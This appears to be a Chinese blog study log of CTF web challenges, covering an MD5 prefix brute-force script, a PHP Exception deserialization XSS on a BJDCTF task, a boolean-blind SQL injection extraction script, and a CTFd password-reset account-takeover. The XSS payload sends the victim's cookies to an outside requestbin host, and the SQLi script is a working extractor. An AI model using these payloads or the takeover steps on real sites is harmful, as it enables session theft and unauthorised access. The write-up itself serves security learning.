学习记录--Day11 and Day12

记录一个求md5加密后前六位值确定的脚本

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

在这里插入图片描述

或者

import hashlib
a= "0123456789"
for o in a:
    for p in a:
        for q in a:
            for r in a:
                for s in a:
                    for t in a:
                        for u in a:
                            b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
                            md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
                            if ((md5[0:6])=='6d0bc1'):
                                print (b)

ssi注入漏洞(服务端包含漏洞):
参考

题目:[BJDCTF 2nd]xss之光
.git文件泄露,GitHack获取源码:

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

利用php的原生类进行xss payload,用的是Exception反序列化

<?php
$a = new Exception("<script>window.location.href=\"http://http.requestbin.buuoj.cn/1nrks0e1?cookie=\"+escape(document[\"cookie\"])</script>");
echo $b = urlencode(serialize($a));

payload:
?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A115%3A%22%3Cscript%3Ewindow.location.href%3D%22http%3A%2F%2Fhttp.requestbin.buuoj.cn%2F1nrks0e1%3Fcookie%3D%22%2Bescape%28document%5B%22cookie%22%5D%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A52%3A%22C
抓包后,在cookie中得到flag,而且此时是已经Unicode过的,需要解一下。

题目二:[WUSTCTF2020]颜值成绩查询
经过几次测试可以发现是布尔盲注,可以用1^0,
if(length(database())>1,1,0)测试
之前做过涉及到二分法的题,
exp:

import requests

url = "http://ebf95ad7-9c24-4771-8d98-b0b14cb1b310.node3.buuoj.cn/?stunum="

result = ""
i = 0

while (True):
    i = i + 1
    head = 32
    tail = 127

    while (head < tail):
        mid = (head + tail) >> 1

        # payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
        payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (
        i, mid)

        r = requests.get(url + payload)
        r.encoding = "utf-8"
        # print(url+payload)
        if "your score is: 100" in r.text:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

运行爆出来的表名很奇怪,也不知道是为什么。。。
就先这样吧,主要是学习一下这个脚本怎么写。。。
题目三:[V&N2020 公开赛]HappyCTFd
漏洞参考文章.

漏洞利用方式:
首先注册一个用户名包含空格,默认的管理员是admin,那么就可以注册一个 admin。

然后,退出登录,点重置密码。

这时候邮箱里就会收到一个url,这个url后面拼接的token实际上是属于用户名admin的

将自己注册的账号用户名修改成其他

然后点开链接修改密码,admin的密码就被修改了
(就按照上面的步骤解题就可以了)
由于访问页面后来一直返回503报错,复现有一些困难。。。

最近做的题要么就是完全看不懂,要么就是题目环境问题,要么就是照着wp一步步做都出不来,我吐了。。。
不过上面的题目和知识点中还有很多需要补充的地方。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值